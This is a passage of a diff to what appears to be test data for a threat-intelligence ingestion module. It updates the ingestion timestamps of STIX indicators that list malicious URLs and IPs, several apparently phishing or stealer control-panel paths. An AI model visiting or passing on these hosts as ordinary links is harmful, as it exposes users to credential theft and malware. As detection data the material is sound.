CyberCrime\",\"id\":\"indicator--8dff68c1-1114-4092-9f29-f655f27d2337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.261Z\",\"name\":\"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.261Z\"}", "category": "threat", "type": "indicator", @@ -17231,7 +17231,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024583200Z", + "ingested": "2021-12-14T14:57:43.118312381Z", "original": "{\"created\":\"2020-02-05T02:01:18.285Z\",\"description\":\"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--19636e7d-febc-4ae1-879a-28af129c19b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.285Z\",\"name\":\"mal_url: http://credoaz.com/journals/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://credoaz.com/journals/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.285Z\"}", "category": "threat", "type": "indicator", @@ -17283,7 +17283,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024590500Z", + "ingested": "2021-12-14T14:57:43.118312822Z", "original": "{\"created\":\"2020-02-05T02:01:21.73Z\",\"description\":\"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--593225c7-68c8-44db-82bf-2c550931a60c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-05T02:01:21.73Z\",\"name\":\"mal_url: http://bestlogs.myjino.ru/best/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:21.73Z\"}", "category": "threat", "type": "indicator", @@ -17334,7 +17334,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024597500Z", + "ingested": "2021-12-14T14:57:43.118313269Z", "original": "{\"created\":\"2020-02-06T02:10:08.953Z\",\"description\":\"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime\",\"id\":\"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:10:08.953Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:08.953Z\"}", "category": "threat", "type": "indicator", @@ -17385,7 +17385,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024636300Z", + "ingested": "2021-12-14T14:57:43.118313706Z", "original": "{\"created\":\"2020-02-06T02:10:15.947Z\",\"description\":\"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--9586420f-3737-47b6-8d58-526f629d66e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:10:15.947Z\",\"name\":\"mal_url: http://justwer.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://justwer.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.947Z\"}", "category": "threat", "type": "indicator", @@ -17430,7 +17430,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024643700Z", + "ingested": "2021-12-14T14:57:43.118314180Z", "original": "{\"created\":\"2020-02-06T02:10:15.988Z\",\"description\":\"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--4d0f3370-af7d-4902-abea-65d9f924458b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-06T02:10:15.988Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.988Z\"}", "category": "threat", "type": "indicator", @@ -17482,7 +17482,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024649400Z", + "ingested": "2021-12-14T14:57:43.118314653Z", "original": "{\"created\":\"2020-02-06T02:10:22.051Z\",\"description\":\"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--12dac6fb-e53b-4742-9cc4-da362e880571\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:10:22.051Z\",\"name\":\"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:22.051Z\"}", "category": "threat", "type": "indicator", @@ -17527,7 +17527,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024657100Z", + "ingested": "2021-12-14T14:57:43.118315098Z", "original": "{\"created\":\"2020-02-06T02:10:23.024Z\",\"description\":\"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-06T02:10:23.024Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:23.024Z\"}", "category": "threat", "type": "indicator", @@ -17579,7 +17579,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024661100Z", + "ingested": "2021-12-14T14:57:43.118315967Z", "original": "{\"created\":\"2020-02-06T02:10:35.597Z\",\"description\":\"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--524c1a55-264d-4f41-a854-1f0601921675\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-06T02:10:35.597Z\",\"name\":\"mal_url: http://f0378370.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:35.597Z\"}", "category": "threat", "type": "indicator", @@ -17630,7 +17630,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024665700Z", + "ingested": "2021-12-14T14:57:43.118316474Z", "original": "{\"created\":\"2020-02-06T02:10:59.132Z\",\"description\":\"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:10:59.132Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:59.132Z\"}", "category": "threat", "type": "indicator", @@ -17681,7 +17681,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024671Z", + "ingested": "2021-12-14T14:57:43.118316917Z", "original": "{\"created\":\"2020-02-06T02:11:08.205Z\",\"description\":\"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6b38040c-6578-43c4-8cec-a426d1079a96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-06T02:11:08.205Z\",\"name\":\"mal_url: http://f0396918.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396918.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:08.205Z\"}", "category": "threat", "type": "indicator", @@ -17733,7 +17733,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024675600Z", + "ingested": "2021-12-14T14:57:43.118317409Z", "original": "{\"created\":\"2020-02-06T02:11:15.653Z\",\"description\":\"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-06T02:11:15.653Z\",\"name\":\"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:15.653Z\"}", "category": "threat", "type": "indicator", @@ -17784,7 +17784,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024680200Z", + "ingested": "2021-12-14T14:57:43.118317935Z", "original": "{\"created\":\"2020-02-06T02:11:17.072Z\",\"description\":\"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.072Z\",\"name\":\"mal_url: http://l5056942.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l5056942.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.072Z\"}", "category": "threat", "type": "indicator", @@ -17836,7 +17836,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024683800Z", + "ingested": "2021-12-14T14:57:43.118318321Z", "original": "{\"created\":\"2020-02-06T02:11:17.098Z\",\"description\":\"TS ID: 55290730797; iType: mal_url; State: active; Org: LLC Eximius; Source: CyberCrime\",\"id\":\"indicator--788aa60d-57c8-4a4c-9666-d6869ccd6c49\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.098Z\",\"name\":\"mal_url: http://h146438.s21.test-hf.su/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://h146438.s21.test-hf.su/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.098Z\"}", "category": "threat", "type": "indicator", @@ -17888,7 +17888,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024689Z", + "ingested": "2021-12-14T14:57:43.118318713Z", "original": "{\"created\":\"2020-02-06T02:11:27.123Z\",\"description\":\"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime\",\"id\":\"indicator--29909afa-ad21-493c-b420-870dbc8dd0da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:11:27.123Z\",\"name\":\"mal_url: http://tranpip.com/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tranpip.com/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:27.123Z\"}", "category": "threat", "type": "indicator", @@ -17939,7 +17939,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024696600Z", + "ingested": "2021-12-14T14:57:43.118319202Z", "original": "{\"created\":\"2020-02-06T02:11:37.189Z\",\"description\":\"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:11:37.189Z\",\"name\":\"mal_url: http://l1430a3c.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:37.189Z\"}", "category": "threat", "type": "indicator", @@ -17991,7 +17991,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024704100Z", + "ingested": "2021-12-14T14:57:43.118319699Z", "original": "{\"created\":\"2020-02-06T02:12:51.488Z\",\"description\":\"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:12:51.488Z\",\"name\":\"mal_url: http://f0391270.xsph.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:51.488Z\"}", "category": "threat", "type": "indicator", @@ -18042,7 +18042,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024709600Z", + "ingested": "2021-12-14T14:57:43.118320082Z", "original": "{\"created\":\"2020-02-06T02:12:52.562Z\",\"description\":\"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:12:52.562Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:52.562Z\"}", "category": "threat", "type": "indicator", @@ -18094,7 +18094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024716700Z", + "ingested": "2021-12-14T14:57:43.118320472Z", "original": "{\"created\":\"2020-02-06T02:13:24.038Z\",\"description\":\"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:13:24.038Z\",\"name\":\"mal_url: http://xmpzi.icu/blue/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xmpzi.icu/blue/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:24.038Z\"}", "category": "threat", "type": "indicator", @@ -18145,7 +18145,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024723900Z", + "ingested": "2021-12-14T14:57:43.118321019Z", "original": "{\"created\":\"2020-02-06T02:13:26.405Z\",\"description\":\"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-35\"],\"modified\":\"2020-02-06T02:13:26.405Z\",\"name\":\"mal_url: http://155.94.210.79/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.94.210.79/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:26.405Z\"}", "category": "threat", "type": "indicator", @@ -18196,7 +18196,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024731Z", + "ingested": "2021-12-14T14:57:43.118321458Z", "original": "{\"created\":\"2020-02-06T02:14:04.592Z\",\"description\":\"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:14:04.592Z\",\"name\":\"mal_url: http://lf9a7e2b.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:04.592Z\"}", "category": "threat", "type": "indicator", @@ -18247,7 +18247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024738300Z", + "ingested": "2021-12-14T14:57:43.118321884Z", "original": "{\"created\":\"2020-02-06T02:14:13.434Z\",\"description\":\"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:14:13.434Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.434Z\"}", "category": "threat", "type": "indicator", @@ -18292,7 +18292,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024745400Z", + "ingested": "2021-12-14T14:57:43.118322272Z", "original": "{\"created\":\"2020-02-06T02:14:13.474Z\",\"description\":\"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-16\"],\"modified\":\"2020-02-06T02:14:13.474Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.474Z\"}", "category": "threat", "type": "indicator", @@ -18343,7 +18343,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024752800Z", + "ingested": "2021-12-14T14:57:43.118322810Z", "original": "{\"created\":\"2020-02-06T02:14:13.506Z\",\"description\":\"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:14:13.506Z\",\"name\":\"mal_url: http://tikkies.eu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tikkies.eu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.506Z\"}", "category": "threat", "type": "indicator", @@ -18394,7 +18394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024759900Z", + "ingested": "2021-12-14T14:57:43.118323262Z", "original": "{\"created\":\"2020-02-06T02:14:14.285Z\",\"description\":\"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:14:14.285Z\",\"name\":\"mal_url: http://lb1a9935.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:14.285Z\"}", "category": "threat", "type": "indicator", @@ -18445,7 +18445,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024767Z", + "ingested": "2021-12-14T14:57:43.118323652Z", "original": "{\"created\":\"2020-02-06T02:14:30.841Z\",\"description\":\"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime\",\"id\":\"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-06T02:14:30.841Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:30.841Z\"}", "category": "threat", "type": "indicator", @@ -18497,7 +18497,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024774200Z", + "ingested": "2021-12-14T14:57:43.118324169Z", "original": "{\"created\":\"2020-02-07T01:58:49.531Z\",\"description\":\"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.531Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.golob/ds.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.golob/ds.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.531Z\"}", "category": "threat", "type": "indicator", @@ -18549,7 +18549,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024781500Z", + "ingested": "2021-12-14T14:57:43.118324610Z", "original": "{\"created\":\"2020-02-07T01:58:49.782Z\",\"description\":\"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--44a6ba7f-2847-45c5-b4f3-452582094240\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.782Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.jonovis/xr.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.782Z\"}", "category": "threat", "type": "indicator", @@ -18601,7 +18601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024793300Z", + "ingested": "2021-12-14T14:57:43.118324994Z", "original": "{\"created\":\"2020-02-07T01:59:00.621Z\",\"description\":\"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime\",\"id\":\"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-07T01:59:00.621Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://189.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:59:00.621Z\"}", "category": "threat", "type": "indicator", @@ -18653,7 +18653,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024800800Z", + "ingested": "2021-12-14T14:57:43.118325717Z", "original": "{\"created\":\"2020-02-07T02:01:59.646Z\",\"description\":\"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--a8895396-ac11-49f3-bb81-6e854b871870\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:01:59.646Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.fotoci/ji.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:01:59.646Z\"}", "category": "threat", "type": "indicator", @@ -18705,7 +18705,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024806100Z", + "ingested": "2021-12-14T14:57:43.118326123Z", "original": "{\"created\":\"2020-02-07T02:02:24.529Z\",\"description\":\"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:02:24.529Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.hokbi/cv.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:02:24.529Z\"}", "category": "threat", "type": "indicator", @@ -18750,7 +18750,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024830800Z", + "ingested": "2021-12-14T14:57:43.118326648Z", "original": "{\"created\":\"2020-02-08T14:02:11.92Z\",\"description\":\"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--0e0304f5-9735-4c6d-a860-95633369db34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:02:11.92Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:11.92Z\"}", "category": "threat", "type": "indicator", @@ -18795,7 +18795,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024834800Z", + "ingested": "2021-12-14T14:57:43.118327145Z", "original": "{\"created\":\"2020-02-08T14:02:14.399Z\",\"description\":\"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-08T14:02:14.399Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:14.399Z\"}", "category": "threat", "type": "indicator", @@ -18846,7 +18846,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024839800Z", + "ingested": "2021-12-14T14:57:43.118327541Z", "original": "{\"created\":\"2020-02-08T14:02:17.271Z\",\"description\":\"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-08T14:02:17.271Z\",\"name\":\"mal_url: 